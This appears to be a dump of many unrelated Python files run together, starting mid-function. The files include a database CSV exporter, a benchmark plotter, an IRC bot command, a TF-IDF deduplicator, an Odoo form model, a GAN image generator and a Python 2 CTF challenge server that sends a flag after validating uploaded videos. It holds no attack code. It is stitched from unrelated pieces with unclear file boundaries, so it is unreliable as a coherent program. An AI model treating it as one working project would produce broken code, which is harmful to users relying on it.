        except cx_Oracle.DatabaseError as dberror:
            print(dberror)
            raise
    return df
def Validate():
    """Fetch all rows of the target table and export them to SampleFileName.csv."""
    # Enter the Query
    JenkinsidQuery = """select * from table_name"""
    # Call dbquery function to retrieve the data
    sqlreturnvaluedf = dbquery(JenkinsidQuery)
    # Fill NA for empty columns in each row
    query_by_Jenkinsid = sqlreturnvaluedf.fillna('NA')
    # Generate CSV File
    query_by_Jenkinsid.to_csv('SampleFileName.csv')
# Call the Validate method only when executed as a script, so importing
# this module no longer triggers a database round-trip.
if __name__ == "__main__":
    Validate()
|
#!/usr/bin/env python3
# coding=utf-8
import os
import argparse
import matplotlib.pyplot as plt
import numpy as np
# To add a new benchmark module, append its name to `modules` below.
# NOTE: the benchmark program must print its results in exactly this order!
# If the number of modules exceeds the number of entries in `colors`, add a
# new color; see
# https://matplotlib.org/3.1.0/gallery/color/named_colors.html
# After a successful build (make), run:  python run_and_draw.py
modules = ["ompp", "reload", "remove", "allpipe", "pipe_1", "dlt"]
colors = ["blue", "orange", "green", "red", "purple",
          "brown", "pink", "gray", "olive", "cyan"]
# Maps module name -> list of timing results, one entry per problem size.
module_data = {}
if __name__ == "__main__":
    # CLI: problem size sweep [--n, --N) step --interval, --T time steps.
    # (Help strings are user-facing output and are kept verbatim.)
    parser = argparse.ArgumentParser(description="Stencil测试脚本\n运行样例 python run_and_draw.py --n 1000 --N 21000 --interval 1000 --T 10000",
                                     formatter_class=argparse.RawTextHelpFormatter)
    parser.add_argument(
        "--n",
        default = 10000,
        type = int,
        help = "问题规模大小N的最小值,即从N等于多少开始测试, 默认从1000开始"
    )
    parser.add_argument(
        "--N",
        default = 80000,
        type = int,
        help = "问题规模大小N的最大值,即测N一直到多少为止, 默认直到20000"
    )
    parser.add_argument(
        "--interval",
        default = 5000,
        type = int,
        help = "从n-N,间隔多少测一次,默认为1000, 即1000, 2000, 3000......20000"
    )
    parser.add_argument(
        "--T",
        default = 5000,
        type = int,
        help = "Stencil运行的时间步长,默认为10000步"
    )
    args = parser.parse_args()
    for module in modules:
        module_data[module] = []
    # Run the benchmark executable for every problem size and collect one
    # "name=value" line per module from its stdout (order must match `modules`).
    for i in range(args.n, args.N, args.interval):
        result = os.popen("./exe_1d3p {} {} 5000 1".format(i, args.T))
        res = result.read()
        moduel_index = 0  # NOTE(review): typo for 'module_index' (kept as-is)
        for line in res.splitlines():
            if "=" not in line:
                continue
            line = line.split("=")
            module_data[modules[moduel_index]].append(float(line[1]))
            moduel_index = moduel_index + 1
    # There must be a distinct color available for every module.
    assert(len(modules) < len(colors))
    x = np.arange(args.n, args.N, args.interval)
    color_index = 0
    lines = []
    # One curve per module, colored from the palette above.
    for module in modules:
        line, = plt.plot(x, module_data[module], color = colors[color_index])
        lines.append(line)
        color_index = color_index + 1
    plt.legend(lines, modules, loc = "upper right")
    plt.xlabel("N")
    plt.ylabel("Stencil/s")
    plt.savefig("result.png")
    plt.show()
|
# NOTE(review): Python 2 only -- raw_input() does not exist in Python 3.
word = raw_input("Enter: ")
# NOTE(review): dead store -- the value read above is discarded immediately.
word = None
|
import z
# De-duplicate 2019 CSVs per ticker: keep only the first row for each date.
stocks = z.getp("listofstocks")
allowed = ["A", "B", "C"]
for astock in stocks:
    # Only tickers starting with an allowed letter are processed.
    if astock[0] not in allowed:
        continue
    # Fix: define 'path' before the try so the handler below can never hit
    # a NameError (the original referenced it even when getPath() raised).
    path = None
    try:
        path = z.getPath("split/{}/{}_2019.csv".format(astock[0], astock))
        with open(path, "r") as f:
            lines = f.readlines()
        # Rewrite the file keeping only the first line seen for each date.
        with open(path, "w") as f:
            prevline = None
            for aline in lines:
                date = aline.split(',')[0]
                if date != prevline:
                    f.write(aline)
                prevline = date
    except Exception:
        # Fix: narrowed from a bare 'except' (which also swallowed
        # KeyboardInterrupt/SystemExit); still best-effort per ticker.
        print("path : {}".format( path ))
|
from mod_base import*
class GiveOP(Command):
    """Give OPs to yourself (default), or a list of nicks, or everyone (with '*')."""

    def run(self, win, user, data, caller=None):
        """Grant +o: to all users for '*', the caller when no data, else
        to each valid nick listed in *data*."""
        args = Args(data)
        if "*" in args:
            users = win.GetUsers()  # FIXME: drop unneccesary nicks
            win.GiveUserModes(users, IRC_MODE_OP)
        elif data is None:  # fix: identity check instead of '== None'
            win.GiveUserModes([user], IRC_MODE_OP)
        else:
            users = []
            for arg in args:
                # Fix: use a separate name -- the original clobbered the
                # 'user' parameter while resolving nicks.
                found = self.bot.FindUser(arg)
                if found is False:
                    continue
                if win.HasUser(found):
                    users.append(found)
            if users:
                win.GiveUserModes(users, IRC_MODE_OP)
            else:
                win.Send("invalid nicks")
# Registration metadata consumed by the bot's module loader.
module = {
    "class": GiveOP,
    "type": MOD_COMMAND,  # exposed as a chat command
    "level": 2,           # minimum user level required to run it
    "zone":IRC_ZONE_BOTH
}
from Student import Student
def readStudentList():
    """Interactively read students until an empty last name is entered.

    :returns: list of Student objects with their grades recorded.
    """
    studentList = []
    ln = input("What is the last name of the first person?")
    while(len(ln) > 0):
        fn = input("What is their first name?")
        grades = input("What are the grades -- input on one line")
        s = Student(ln, fn)
        s.addGrades(grades)
        studentList.append(s)
        # An empty answer here terminates the loop.
        ln = input("What is the last name of the next person?")
    return studentList
def printStudentList(studentList):
    """Print each student on its own line (uses Student.__str__)."""
    for student in studentList:
        print(student)
def main():
    """Read students interactively, sort by average (descending), print."""
    myStudentList = readStudentList()
    myStudentList.sort(key=Student.getAverage, reverse = True)
    printStudentList(myStudentList)


# Fix: guard the entry point so importing this module is side-effect free
# (the original called main() unconditionally).
if __name__ == "__main__":
    main()
from flask_restful import Resource, abort, reqparse
from controllers import checkSend
from flask import request
class Main(Resource):
    """Root endpoint: simple liveness message."""
    def get(self):
        return 'Mail backup running'
class sendMail(Resource):
    """Endpoint that triggers mail sending via the checkSend controller."""
    def get(self):
        return 'Email sending details are displayed here'

    def post(self):
        # Expects a JSON body containing a 'code' key.
        data = request.json
        # return (data['code'])
        return checkSend(data['code'])
|
# By Zhufyak V.V
# zhufyakvv@gmail.com
# github.com/zhufyakvv
# 27.02.2017
Asterisk = "*"


class AsteriskPattern:
    """Match words against a pattern containing '*' wildcards.

    The pattern is split on '*'; a word matches when it starts with the
    first fragment, ends with the last one, and contains every fragment
    in order without overlap.
    """

    def __init__(self, pattern):
        self.pattern = pattern
        self.split = pattern.split(Asterisk)
        self.text = ""
        self.result = []

    def init(self, pattern):
        """Re-initialize with a new pattern string."""
        self.pattern = pattern
        self.split = pattern.split(Asterisk)

    def check(self, word):
        """
        Checks if word is similar to pattern
        :param word: string
        :return: bool of similarity
        """
        fragments = self.split
        # The word must begin with the first (non-wildcard) fragment.
        if fragments[0] and not word.startswith(fragments[0]):
            return False
        # Left-to-right scan: every fragment must occur, in order, starting
        # at or after the end of the previous fragment's match.
        position = 0
        for fragment in fragments:
            position = word.find(fragment, position)
            if position < 0:
                return False
            position += len(fragment)
        # The word must also end with the last fragment (an empty last
        # fragment means the pattern ended with '*': any suffix matches).
        last = fragments[-1]
        return not last or word.endswith(last)

    def file(self, filename):
        """Read pattern (line 1) and text (line 2) from *filename*, then
        append the matching words -- raw order and sorted by length -- to
        the same file.

        Fix: the original leaked both file handles; 'with' closes them.
        """
        with open(filename, "r+") as handle:
            text = handle.read()
        lines = text.split("\n")
        self.init(lines[0])
        self.text = lines[1]
        matches = [word for word in self.text.split(" ") if self.check(word)]
        self.result = [matches.copy()]
        matches.sort(key=len, reverse=False)
        self.result.append(matches)
        # Re-open in append mode and record both result lists.
        with open(filename, "a+") as handle:
            handle.write(str(self.result[0]) + "\n")
            handle.write(str(self.result[1]) + "\n")
|
import socket, threading, sys, os
from datetime import datetime
from constants import *
from time import sleep
import gansta_eye
class ClientThread(threading.Thread):
    """Python 2 server thread for one client.

    Receives one video per letter of the target string, validates each
    with gansta_eye, and sends the flag only if every letter passes.
    """

    def __init__(self, client_socket, cleint_ip, client_port):
        threading.Thread.__init__(self)
        self.ip = cleint_ip
        self.port = client_port
        self.client_socket = client_socket
        self.client_socket.settimeout(socket_timeout)
        # Timestamp-based id made filesystem-safe; used in video filenames.
        self.id = str(datetime.now()).replace(":", "-").replace(".", "-").replace(" ", "-")
        self.dead = False  # polled by main() to prune finished threads
        print "#::New thread started for ({0}, ({1}))".format(str(cleint_ip), str(client_port))

    def validate_video(self, video_file, letter):
        # Delegate recognition of the expected letter to gansta_eye.
        print "#:: Let's check u..."
        return gansta_eye.detectIt(video_file, letter)

    def run(self):
        """Receive/validate one video per letter; reveal the flag on success."""
        print "#{}::Listening for requests.".format(self.id)
        target_string = "1NDVCLUB"
        validated = 0
        for letter in target_string:
            print "#::Server is expecting", letter
            letter_video = None
            video_created = False
            client_bytes = "CamStudio"  # non-empty sentinel to enter the loop
            bytes_received = 0
            print "#::Ready to receive..."
            while len(client_bytes):
                try:
                    client_bytes = self.client_socket.recv(input_chunk_size)
                    bytes_received += len(client_bytes)
                    if bytes_received > max_size_bytes:
                        # Abort oversized uploads via the except path below.
                        raise Exception("#::Too long video. Ain't u a cop?")
                    if client_bytes and client_bytes != "JustALilByte":
                        if not video_created: #lazy here
                            letter_video = open("video_{0}_{1}.avi".format(letter, self.id), 'wb')
                            video_created = True
                        letter_video.write(client_bytes)
                        letter_video.flush()
                        print "-",
                    else:
                        # Empty chunk or terminator marker: end of this video.
                        print
                        if video_created:
                            print "#::Shiip, it seems your video is over."
                            letter_video.flush()
                            letter_video.close()
                            print "#::video_{0}_{1} is saved.".format(letter, self.id)
                        else:
                            print "#::Nothin' from u nothin' from me, baby."
                        break
                except Exception as some_error:
                    print "#{0}::ERROR({1})".format(self.id, str(some_error))
                    break
            if letter_video is not None:
                filename = "video_{0}_{1}.avi".format(letter, self.id)
                if self.validate_video(filename, letter):
                    print "#::Cool, br0!"
                    validated += 1
                    # The uploaded video is always deleted after checking.
                    os.remove(filename)
                    print "#::I have removed all da evidence, my little homie. Relax for a while and keep pushin'!"
                    sleep(pause)
                else:
                    print "#::U've made a mistake. VIP zone ain't for u."
                    os.remove(filename)
                    print "#::I do not need your video now, d0ll. I have thrown it away."
                    break
            else:
                print "#::No video - no deal. Get out from our hood."
                break
        if validated == len(target_string):
            # Every letter validated: read and send the flag.
            print "#::Now you are in our club, man. Take your gun."
            try:
                flag_file = open(".\\test_folder\\flag.txt", "r")
                flag = flag_file.readline()
                flag_file.close()
                print flag
                self.client_socket.send(flag)
                print "#::Use it as a real gangsta."
            except Exception as error:
                print "#::Worse for you, baby.", error
        else:
            print "See ya."
        self.client_socket.close()
        self.dead = True
        return
def main():
    """Accept clients forever, one ClientThread each; prune dead threads."""
    out = sys.stdout
    host = hosts
    port = server_port
    server_socket = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
    # Allow fast restarts on the same port.
    server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server_socket.bind((host, port))
    client_threads = []
    server_socket.listen(max_users)
    while True:
        try:
            print "\n~~~Listening for incoming connections...(online:" + str(len(client_threads))+ ")\n"
            (new_client_socket, (client_ip, client_port)) = server_socket.accept()
            client_thread = ClientThread(new_client_socket, client_ip, client_port)
            client_thread.start()
            client_threads.append(client_thread)
            # NOTE(review): removing items from the list being iterated can
            # skip entries; they are collected on a later pass, though.
            for thread in client_threads:
                if thread.dead:
                    client_threads.remove(thread)
        except:
            print "~~~About to break..."
            break
    server_socket.close()
    sys.stdout = out
    print "~~~PROGRAM OVER"


main()
import numpy as np
import kero.utils.utils as ut
import param_estimate as pe
import matplotlib.pyplot as plt
from scipy.integrate import RK45
import csv
import pickle
es = pe.DE_param_estimator()
print("----------------- Load Data -------------------------------")
# Experimental data: Xr = sample times, Yr = measured values.
Xr, Yr = pe.load_data(plot_data=0)
x0 = np.array([Yr[0]])  # initial condition n(t=0)
# Wrap each scalar into a 1-element array, the shape the RK45 helpers expect.
t_set_expt = [np.array([x]) for x in Xr]
n_set_expt = [np.array([x]) for x in Yr]
print("x0 = ",x0)
print("Xr[:5] = ",Xr[:5])
print("Yr[:5] = ",Yr[:5])
print("t_set_expt[:5] = ",t_set_expt[:5])
print("n_set_expt[:5] = ",n_set_expt[:5])
#.#
print("----------------- Prepare Model ---------------------------")
# MODEL used to fit this data
#
# We are estimating the parameters of the following differential equations:
# dn/dt = F(n, p) = G - k1 * n - k2 * n**2 - k3 * n**3
# where p is the parameter (G,k1,k2,k3)
def F(y, p):
    """Right-hand side of dn/dt = G - k1*n - k2*n**2 - k3*n**3,
    with parameter vector p = (G, k1, k2, k3)."""
    g, k1, k2, k3 = p[0], p[1], p[2], p[3]
    return g - k1 * y - k2 * y**2 - k3 * y**3
# Partial derivatives of F with respect to each parameter (G, k1, k2, k3),
# used as the gradient in the parameter-update step.
# Fix: converted from lambda assignments to named functions (PEP 8 E731).
def diff_part_G(x):
    return 1


def diff_part_k1(x):
    return -x


def diff_part_k2(x):
    return -x**2


def diff_part_k3(x):
    return -x**3


list_of_derivatives = [diff_part_G, diff_part_k1, diff_part_k2, diff_part_k3]
print(" Model prepared.")
#.#
do_initial_testing = 1
if do_initial_testing:
    print("---------------- Prepare Initial guess --------------------")
    # Before optimizing, try playing around the p_init values here
    # We will choose the range of uniform random values for guess p based on tests conducted here
    # Write down choices that seem good and any remarks here
    #
    # 1. p_init = [0,5e-2,2e-3,1.1e-7] # near the real value. all n less than expt data
    # 2. p_init = [0,5e-2,1e-3,1.1e-7] # seems to be better than 1
    # 3. p_init = [0,5e-2,0,1.1e-7] # all n above expt data
    # 4. p_init = [0,1e-1,1e-4,1.1e-7] # small n above expt data, larger n below
    # 5. p_init = [0,1e-2,1e-3,1.1e-7] # exceedingly close! Let's vary around these values instead
    #
    #
    #
    collection_of_p_init =[
        [0,1e-3,0.5e-3,1.2e-7], # guess 1
        [0,1e-2,0,1e-7], # guess 2
        [0,0,1.5e-3,1e-7], # guess 3
    ]
    fig = plt.figure()
    ax = fig.add_subplot(111)
    no_of_test = len(collection_of_p_init)
    for i in range(no_of_test):
        p_init = collection_of_p_init[i] # guess p
        time_checkpoints = t_set_expt
        # Integrate the model with this guess over the experimental time grid.
        def f(t,y):
            return np.array([F(y[0],p_init)])
        _,_, x_checkpoint, t_checkpoint_new = pe.RK45_wrapper(x0, time_checkpoints, f, stepsize=None)
        ax.plot(t_checkpoint_new,x_checkpoint, label="guess "+str(i+1), color=(0,1-1*(i+1)/no_of_test,1*(i+1)/no_of_test))
        # To find what is the best learning_rate
        print(" testing initial guess parameters: ",i+1)
        es.update_p(t_set_expt, n_set_expt, F, p_init, list_of_derivatives, verbose=11)
    # Overlay the experimental data for visual comparison of the guesses.
    ax.plot(Xr,Yr, color = "r", label="expt values")
    ax.legend( )
    ax.set_xlabel("t")
    ax.set_ylabel("n")
    plt.show()
#.#
# ------------------------------------------------------------------------------- #
start_op = 0
if start_op:
    print("----------------- Start Optimizing ---------------------------")
    # ********* Settings *************
    p_init_max = [1e-10,0 ,0,0.9e-7] # [Gmax,k1max,k2max,k3max]
    p_init_min = [1e-10, 2e-2,2e-3,1.2e-7] # [Gmin ,k1min,k2min,k3min]
    no_of_tries = 3
    save_name = 'fitting_data'
    es.learning_rate= 1e-16
    no_of_iterations = 10
    save_interval = 1
    # ********************************
    n_set_expt_MAT = pe.RK45_output_to_list(n_set_expt) # MATRIX list form
    for j in range(no_of_tries):
        # Draw a random initial parameter vector uniformly from the box
        # [p_init_min, p_init_max], one component at a time.
        p_init = []
        for a,b in zip(p_init_min, p_init_max):
            p_init.append(np.random.uniform(a,b))
        p_now= p_init
        save_count = 0
        SAVE_DATA = []
        print("TRY ", j+1," / ",no_of_tries)
        mse_list = []
        for i in range(no_of_iterations + 1):
            if i>0:
                # for i =0 , initial state, do not iterate yet
                p_now = es.update_p(t_set_expt, n_set_expt, F, p_now, list_of_derivatives, verbose=0)
            #------------------------ FOR REALTIME OBSERVATION -----------
            # Re-integrate with the current parameters and report the MSE
            # against the experimental data.
            def f(t,y):
                return np.array([F(y[0],p_now)])
            time_checkpoints = t_set_expt
            _,_, n_set_next, t_set_next = pe.RK45_wrapper(x0, time_checkpoints, f, stepsize=None)
            n_set_next_MAT = pe.RK45_output_to_list(n_set_next)
            mse = pe.MSE(n_set_next_MAT,n_set_expt_MAT)
            mse_list.append(mse)
            print(" i = ", i , " -- > mse = ", mse)
            # print(" p_new = ", p_now)
            #------------------------ TO BE SAVED -------------------------
            save_count = save_count + 1
            if save_count == save_interval or i==0:
                save_count = 0
                data_store = {
                    "t_set":t_set_next,
                    "n_set":n_set_next,
                    "p":p_now,
                    "learning_rate":es.learning_rate,
                    "mse_list": mse_list
                }
                SAVE_DATA.append(data_store)
        # Persist this try's whole trajectory with pickle.
        output = open(save_name+"_"+ str(j+1) +".par", 'wb')
        pickle.dump(SAVE_DATA, output)
        output.close()
print("\nClosing Program...")
from rest_framework import serializers
from rest_framework.permissions import IsAuthenticated
from django.db import models
from Nursery_API.models import Users, Nursery, UserPlant, NurseryPlant
from django.contrib.auth import authenticate
from django.contrib.auth.hashers import make_password
# Register serializer
class RegisterUserSerializer(serializers.ModelSerializer):
    """Sign-up serializer: exposes every Users field, password write-only."""

    class Meta:
        model = Users
        fields = '__all__'
        extra_kwargs = {'password': {'write_only': True}}
# User serializer
class UserSerializer(serializers.ModelSerializer):
    """Public profile view of a user: name and age only, no credentials."""
    class Meta:
        model = Users
        fields = ('first_name', 'last_name', 'age')
class RegisterNurserySerializer(serializers.ModelSerializer):
    """Nursery registration serializer; password is write-only."""
    class Meta:
        model = Nursery
        fields = '__all__'
        extra_kwargs = {
            'password': {'write_only': True},
        }
# User serializer
class NurserySerializer(serializers.ModelSerializer):
    """Public view of a nursery: name and location only."""
    class Meta:
        model = Nursery
        fields = ('name', 'location')
|
#!/usr/bin/python3
# variables.py by Bill Weinman [http://bw.org/]
# This is an exercise file from Python 3 Essential Training on lynda.com
# Copyright 2010 The BearHeart Group, LLC
def main():
    """Demonstrate two ways of building a dict and sorted-key iteration."""
    numbers = {
        'one': 1,
        'two': 2,
        'three': 3,
        'four': 4,
        'five': 5,
    }
    # The same mapping built from keyword arguments, then extended.
    spelled = dict(one=1, two=2, three=3, four=4, five=5)
    spelled['seven'] = 7
    print(numbers)
    # Sorting the keys gives a stable, alphabetical listing instead of
    # insertion order.
    for key in sorted(numbers.keys()):
        print(key, numbers[key])


if __name__ == "__main__":
    main()
|
from RPLCD import i2c
from time import *
import subprocess, os, geturl
# 16x2 character LCD driven over I2C (PCF8574 backpack at address 0x27).
lcdmode = 'i2c'
cols = 16
rows = 2
charmap = 'A00'
i2c_expander = 'PCF8574'
address = 0x27
port = 1
lcd = i2c.CharLCD(i2c_expander, address, port=port, charmap=charmap,cols=cols,rows=rows)
lcd.backlight_enabled = True
# Display: first 10 chars of the host IP, a space, then geturl's digest.
lcd.write_string(subprocess.run(['hostname', '-I'],stdout = subprocess.PIPE).stdout.decode('utf-8')[:10])
lcd.write_string(" ")
lcd.write_string(geturl.getDec())
#sleep(5)
#lcd.backlight_enabled = False
#lcd.close(clear=True)
|
#!/usr/bin/env python
import logging
import mylib
# see : https://docs.python.org/2/howto/logging.html#logging-from-multiple-modules
logger = logging.getLogger(__name__)
def main():
    """Configure logging, then emit messages from this module and mylib.

    Fix: ``logging.warn`` / ``Logger.warn`` are deprecated aliases of
    ``warning`` -- replaced (same behavior); the f-string-style ``format``
    call was also switched to lazy %-style args.
    """
    # logging.basicConfig(filename='myapp.log', level=logging.INFO)
    logging.basicConfig(level=logging.INFO)
    logging.getLogger().setLevel(logging.CRITICAL)
    logger.setLevel(logging.WARN)
    logging.warning('inside myapp: Started %s', __file__)
    mylib.do_something()
    logging.warning('inside myapp: Finished %s', __file__)
    logger.warning('inside myapp: testing __name__%s', __name__)


if __name__ == '__main__':
    main()
|
import json
import logging
import nltk
import string
from pathlib import Path
from gensim import corpora, models, similarities
from gensim.models import TfidfModel
from nltk.stem.lancaster import LancasterStemmer
from definitions import TRAIN_SAMPLE_CODE, OUTPUT_DIR, TFIDF_DIR
from nltk.corpus import stopwords
# Preprocess the raw description texts.
def preprocess(courses):
    """Tokenize, lowercase, strip stopwords/punctuation and stem each text.

    :param courses: iterable of raw description strings.
    :returns: list of token lists, one per input document.
    """
    # # lowercase only:
    # texts_lower = [[word for word in document.lower().split()] for document in courses]
    # Tokenize and lowercase each document.
    texts_tokenized = [[word.lower() for word in nltk.word_tokenize(document)] for document in courses]
    # Drop English stopwords.
    english_stopwords = stopwords.words('english')
    texts_filtered_stopwords = [[word for word in document if not word in english_stopwords] for document in
                                texts_tokenized]
    # Drop punctuation tokens.
    texts_filtered = [[word for word in document if not word in string.punctuation] for document in
                      texts_filtered_stopwords]
    # Stem with the Lancaster stemmer.
    st = LancasterStemmer()
    texts = [[st.stem(word) for word in docment] for docment in texts_filtered]
    return texts
# Train the TF-IDF model.
# NOTE(review): 'trian_tfidf' is a typo for 'train_tfidf'; the name is kept
# because callers may depend on it.
def trian_tfidf(descriptions):
    """Build and persist the dictionary, TF-IDF model and similarity index.

    :param descriptions: list of token lists (output of preprocess()).
    """
    logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
    dictionary = corpora.Dictionary(descriptions)
    corpus = [dictionary.doc2bow(description) for description in descriptions]
    tfidf = models.TfidfModel(corpus)
    index = similarities.MatrixSimilarity(tfidf[corpus])
    # index = similarities.Similarity(querypath, corpus_tfidf, len(dictionary))
    # tfidf_dir = Path(TFIDF_DIR)
    # tfidf_dir.mkdir(exist_ok=True, parents=True)
    tfidf.save('./output/test/tfidf.model')
    dictionary.save('./output/test/tfidf_dictionary.dict')
    index.save('./output/test/tfidf_index.index')
def remove_duplicate_code(sample_codes, descriptions):
    """Drop near-duplicate samples and save the survivors as JSON.

    Two samples of the same API whose description TF-IDF similarity is at
    least 0.9 are considered duplicates; the one whose description length
    is closer to 70 words is kept.
    """
    Threshold = 0.9
    dictionary = corpora.Dictionary.load('./output/test/tfidf_dictionary.dict')
    index = similarities.Similarity.load('./output/test/tfidf_index.index')
    tfidf = TfidfModel.load('./output/test/tfidf.model')
    remove_code_index = []
    print(len(descriptions))
    for i in range(len(descriptions)):
        vec_bow = dictionary.doc2bow(descriptions[i])
        vec_tfidf = tfidf[vec_bow]
        sims = index[vec_tfidf]
        # Most similar documents first.
        sort_sims = sorted(enumerate(sims), key=lambda item: -item[1])
        for j in range(len(sort_sims)):
            if sort_sims[j][1] < Threshold:
                break
            else:
                if sample_codes[i]['API'] == sample_codes[sort_sims[j][0]]['API'] and i != sort_sims[j][0]:
                    # Keep the sample whose description length is closer to
                    # 70 words; mark the other one for removal.
                    if abs(70-len(sample_codes[i]['Description'].strip().split(' '))) < abs(70-len(sample_codes[sort_sims[j][0]]['Description'].strip().split(' '))):
                        # vec_bow1 = dictionary.doc2bow([sample_codes[i]['Code']])
                        # vec_tfidf1 = tfidf[vec_bow1]
                        # sims1 = index[vec_tfidf1]
                        #
                        # vec_bow2 = dictionary.doc2bow([sample_codes[sort_sims[j][0]]['Code']])
                        # vec_tfidf2 = tfidf[vec_bow2]
                        # sims2 = index[vec_tfidf2]
                        # if sims1[i] > sims2[sort_sims[j][0]]:
                        # if tfidf.similarity(sample_codes[i]['Code'], sample_codes[i]['Description']) > tfidf.similarity(sample_codes[sort_sims[j][0]]['Code'], sample_codes[sort_sims[j][0]]['Description']):
                        remove_code_index.append(sort_sims[j][0])
                    else:
                        remove_code_index.append(i)
        print(i)
    # Keep every index that was never marked for removal.
    sample_codes_index = [i for i in range(len(sample_codes))]
    sample_codes_index = set(sample_codes_index)
    remove_code_index = set(remove_code_index)
    index = list(sample_codes_index - remove_code_index)
    sample_codes = [sample_codes[i] for i in index]
    # Save the API qualified name, sample code and description.
    save_file = []
    save_path = "RemoveDuplicateSampleCode.json"
    for sample_code in sample_codes:
        json_save = {}
        json_save['API'] = sample_code['API']
        json_save['Code'] = sample_code['Code']
        json_save['Description'] = sample_code['Description']
        save_file.append(json_save)
    with open(OUTPUT_DIR + '/' + save_path, 'w', encoding='utf-8') as json_file:
        json.dump(save_file, json_file, indent=4)
if __name__ == "__main__":
    # Load the training samples and collect their descriptions; the 'with'
    # block closes the file (fix: the original's explicit f.close() inside
    # the with-block was redundant and has been dropped).
    descriptions = []
    with open(TRAIN_SAMPLE_CODE) as f:
        sample_codes = json.load(f)
    for sample_code in sample_codes:
        descriptions.append(sample_code['Description'])
    preprocess_descriptions = preprocess(descriptions)
    # trian_tfidf(preprocess_descriptions)
    remove_duplicate_code(sample_codes, preprocess_descriptions)
|
from datetime import datetime
from app.main import db
class UpdateForm(db.Model):
    """Namings as in Odoo.

    Staging table for alumni profile updates: an alumnus submits new values
    here; an operator later reviews the form and pushes it to Odoo.
    """
    __tablename__ = "update_form"
    form_id = db.Column(db.Integer, primary_key=True, autoincrement=True)
    form_status = db.Column(db.String(100))  # workflow state; starts as 'new'
    name = db.Column(db.String(100)) # full name in ukrainian
    birth_date = db.Column(db.Date())
    image_1920 = db.Column(db.String(500000)) # Odoo saves image as base64 encoded string, f*cking large str
    # email = db.Column(db.String(100)) # Do not allow to update email here, because we use email for login
    contact_country = db.Column(db.String(100)) # selection field
    contact_city = db.Column(db.String(100))
    mobile = db.Column(db.String(15))
    skype = db.Column(db.String(100))
    telegram = db.Column(db.String(100))
    viber = db.Column(db.String(100))
    facebook_link = db.Column(db.String(100))
    linkedin_link = db.Column(db.String(100))
    diploma_naukma = db.Column(db.Boolean)
    bachelor_degree = db.Column(db.Boolean())
    bachelor_faculty = db.Column(db.String(100)) # selection field
    bachelor_speciality = db.Column(db.String(100)) # selection field
    bachelor_year_in = db.Column(db.String(100)) # selection field
    bachelor_year_out = db.Column(db.String(100)) # selection field
    master_degree = db.Column(db.Boolean())
    master_faculty = db.Column(db.String(100)) # selection field
    master_speciality = db.Column(db.String(100)) # selection field
    master_year_in = db.Column(db.String(100)) # selection field
    master_year_out = db.Column(db.String(100)) # selection field
    parent_id = db.Column(db.Integer) # company id in Odoo, many2one field in Odoo
    company_name = db.Column(db.String(100))
    function = db.Column(db.String(100)) # job position
    # foreign keys
    alumni_id = db.Column(db.Integer, db.ForeignKey('alumni.alumni_id', onupdate="CASCADE",
                                                    ondelete="NO ACTION"), nullable=False)
    alumni = db.relationship("Alumni", back_populates="update_form")
    operator_id = db.Column(db.Integer, db.ForeignKey('operator.operator_id', onupdate="CASCADE",
                                                      ondelete="NO ACTION"), nullable=True)
    operator = db.relationship("Operator", back_populates="update_form")

    def __init__(self, name, birth_date, image_1920, contact_country, contact_city, mobile, skype,
                 telegram, viber, facebook_link, linkedin_link, diploma_naukma, bachelor_degree, bachelor_faculty, bachelor_speciality,
                 bachelor_year_in, bachelor_year_out, master_degree, master_faculty, master_speciality,
                 master_year_in, master_year_out, parent_id, company_name, function, alumni_id, operator_id):
        """Create a new form in status 'new'.

        *birth_date* must be an ISO 'YYYY-MM-DD' string; everything else is
        stored as received.
        """
        self.form_status = 'new' # TODO: create enum for the form statuses
        self.name = name
        self.birth_date = datetime.strptime(birth_date, '%Y-%m-%d').date()
        self.image_1920 = image_1920
        self.contact_country = contact_country
        self.contact_city = contact_city
        self.mobile = mobile
        self.skype = skype
        self.telegram = telegram
        self.viber = viber
        self.facebook_link = facebook_link
        self.linkedin_link = linkedin_link
        self.diploma_naukma = diploma_naukma
        self.bachelor_degree = bachelor_degree
        self.bachelor_faculty = bachelor_faculty
        self.bachelor_speciality = bachelor_speciality
        self.bachelor_year_in = bachelor_year_in
        self.bachelor_year_out = bachelor_year_out
        self.master_degree = master_degree
        self.master_faculty = master_faculty
        self.master_speciality = master_speciality
        self.master_year_in = master_year_in
        self.master_year_out = master_year_out
        self.parent_id = parent_id
        self.company_name = company_name
        self.function = function
        self.alumni_id = alumni_id
        self.operator_id = operator_id

    def update(self, data):
        """Apply *data* key/values to matching attributes and commit."""
        for key, item in data.items():
            if hasattr(self, key):
                setattr(self, key, item)
        db.session.commit()
|
import torch
from torchvision.utils import save_image
import os
import utils
import WGAN_split
from tqdm import tqdm
from argparse import ArgumentParser
def get_label(test_file):
    """Parse the testing-label file into a list of integer label vectors.

    The first two lines are headers and are skipped; every remaining line
    is whitespace-separated integers.
    """
    with open(test_file, 'r') as fin:
        fin.readline()
        fin.readline()
        return [[int(tok) for tok in row.split()] for row in fin]
def generate_images(model, label, output_dir, device):
    """Generate one image per conditioning label and save it as <i>.png.

    A fresh 100-dim Gaussian noise vector is drawn for every label row.
    """
    conditions = torch.FloatTensor(label).to(device)
    for idx in tqdm(range(len(label))):
        noise = torch.randn(1, 100).to(device)
        condition = conditions[idx].unsqueeze(0)
        fake = model(noise, condition)
        save_image(utils.denorm(fake),
                   os.path.join(output_dir, '{}.png'.format(idx)))
def main():
    """Parse CLI options, restore the pretrained generator, emit images."""
    parser = ArgumentParser()
    parser.add_argument('--test_file', type=str,
                        help='testing label file')
    parser.add_argument('--model', type=str,
                        help='pretrained generator model')
    parser.add_argument('--output_dir', type=str,
                        help='output images dir')
    parser.add_argument('--device', type=str, default='cuda:0',
                        help='The device you want to run this code')
    args = parser.parse_args()

    labels = get_label(args.test_file)
    generator = WGAN_split.Generator(latent_dim=100, class_dim=15)
    checkpoint = torch.load(args.model)
    generator.load_state_dict(checkpoint['model'])
    generator.to(args.device)
    generator = generator.eval()
    generate_images(generator, labels, args.output_dir, args.device)


if __name__ == '__main__':
    main()
|
import dash_bootstrap_components as dbc
from dash import html
from .util import make_subheading
# Demo section for dash-bootstrap-components ListGroup: shows every
# contextual color, the action/active states, and an item holding
# arbitrary child components.
list_group = html.Div(
    [
        make_subheading("ListGroup", "list_group"),
        dbc.ListGroup(
            [
                dbc.ListGroupItem("No color applied"),
